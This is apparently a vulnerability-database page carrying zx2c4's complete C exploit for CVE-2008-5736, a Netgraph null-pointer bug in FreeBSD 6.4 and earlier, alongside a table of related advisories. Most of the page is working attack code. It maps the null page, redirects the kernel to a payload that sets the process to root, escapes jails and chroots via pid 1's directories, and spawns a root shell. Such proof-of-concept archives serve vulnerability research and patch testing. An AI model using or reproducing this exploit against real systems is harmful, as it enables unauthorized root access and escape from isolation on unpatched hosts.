| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| FreeBSD <= 6.4 Netgraph Local Privledge Escalation Exploit | 11 Mar 201100:00 | – | zdt | |
| CVE-2008-5736 | 26 Dec 200818:00 | – | cve | |
| CVE-2008-5736 | 26 Dec 200818:00 | – | cvelist | |
| FreeBSD 6.4 - Netgraph Privilege Escalation | 10 Mar 201100:00 | – | exploitdb | |
| EUVD-2008-5706 | 7 Oct 202500:30 | – | euvd | |
| FreeBSD 6.4 - Netgraph Privilege Escalation | 10 Mar 201100:00 | – | exploitpack | |
| CVE-2008-5736 | 26 Dec 200818:30 | – | nvd | |
| FreeBSD Security Advisory (FreeBSD-SA-08:13.protosw.asc) | 29 Dec 200800:00 | – | openvas | |
| FreeBSD 6.4 Netgraph Privilege Escalation | 10 Mar 201100:00 | – | packetstorm | |
| Sql injection | 26 Dec 200818:30 | – | prion |
/*
* FreeBSD <= 6.4-RELEASE Netgraph Exploit
* by zx2c4
*
*
* This is an exploit for CVE-2008-5736, the FreeBSD protosw
* and loosely based on Don Bailey's 2008 exploit -
* http://www.exploit-db.com/exploits/7581/ . The thing with
* Don's exploit is that it relies on having a known location
* of allproc, which means having access to the kernel or
* debugging symbols, either of which might not be available.
* Initial attempts included a general memory search for some
* characteristics of allproc, but this was difficult to make
* reliable. This solution here is a much more standard - get
* the current thread, change its permissions, and execl to
* shell. Additionally, it breaks out of chroots and freebsd
* jails by reparenting to pid 1 and copying its fds.
*
* This reliably works on kernels on or below 6.4-RELEASE:
*
* $ gcc a.c
* $ ./a.out
* ~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~
* ~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~
* ~~~~~ greetz to don bailey, edemveiss ~~~~~
*
* [+] mmapping null page
* [+] adding jmp to pwnage in null page
* [+] opening netgraph socket
* [+] triggering null dereference
* [+] elevating permissions
* [+] got root!
* #
*
* It's an oldie, but simple enough that someone needed
* to write another PoC exploit at some point.
*
* cheers,
* zx2c4, 27-2-2011
*
*/
#define _KERNEL
#include <sys/types.h>
#include <sys/time.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/ucred.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/filedesc.h>
#include <sys/queue.h>
#include <netgraph/ng_socket.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#define PAGES 1
volatile int got_root = 0;
int root(void)
{
struct thread *thread;
asm(
"movl %%fs:0, %0"
: "=r"(thread)
);
thread->td_critnest = 0;
thread->td_proc->p_ucred->cr_uid = 0;
thread->td_proc->p_ucred->cr_prison = NULL;
struct proc *parent = thread->td_proc;
while (parent->p_pptr && parent->p_pid != 1)
parent = parent->p_pptr;
thread->td_proc->p_fd->fd_rdir = parent->p_fd->fd_rdir;
thread->td_proc->p_fd->fd_jdir = parent->p_fd->fd_jdir;
thread->td_proc->p_fd->fd_cdir = parent->p_fd->fd_cdir;
thread->td_proc->p_pptr = parent;
got_root = 1;
return 0;
}
int main(int argc, char *argv[])
{
printf("~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n");
printf("~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n");
printf("~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n");
printf("[+] mmapping null page\n");
if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) {
perror("[-] mmap failed");
return -1;
}
printf("[+] adding jmp to pwnage in null page\n");
*(char*)0x0 = 0x90;
*(char*)0x1 = 0xe9;
*(unsigned long*)0x2 = (unsigned long)&root;
printf("[+] opening netgraph socket\n");
int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if (s < 0) {
perror("[-] failed to open netgraph socket");
return -1;
}
printf("[+] triggering null dereference\n");
shutdown(s, SHUT_RDWR);
if (!got_root) {
printf("[-] failed to trigger pwnage\n");
return -1;
}
printf("[+] elevating permissions\n");
setuid(0);
setgid(0);
if (getuid() != 0) {
printf("[-] failed to get root\n");
return -1;
}
printf("[+] got root!\n");
execl("/bin/sh", "sh", NULL);
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation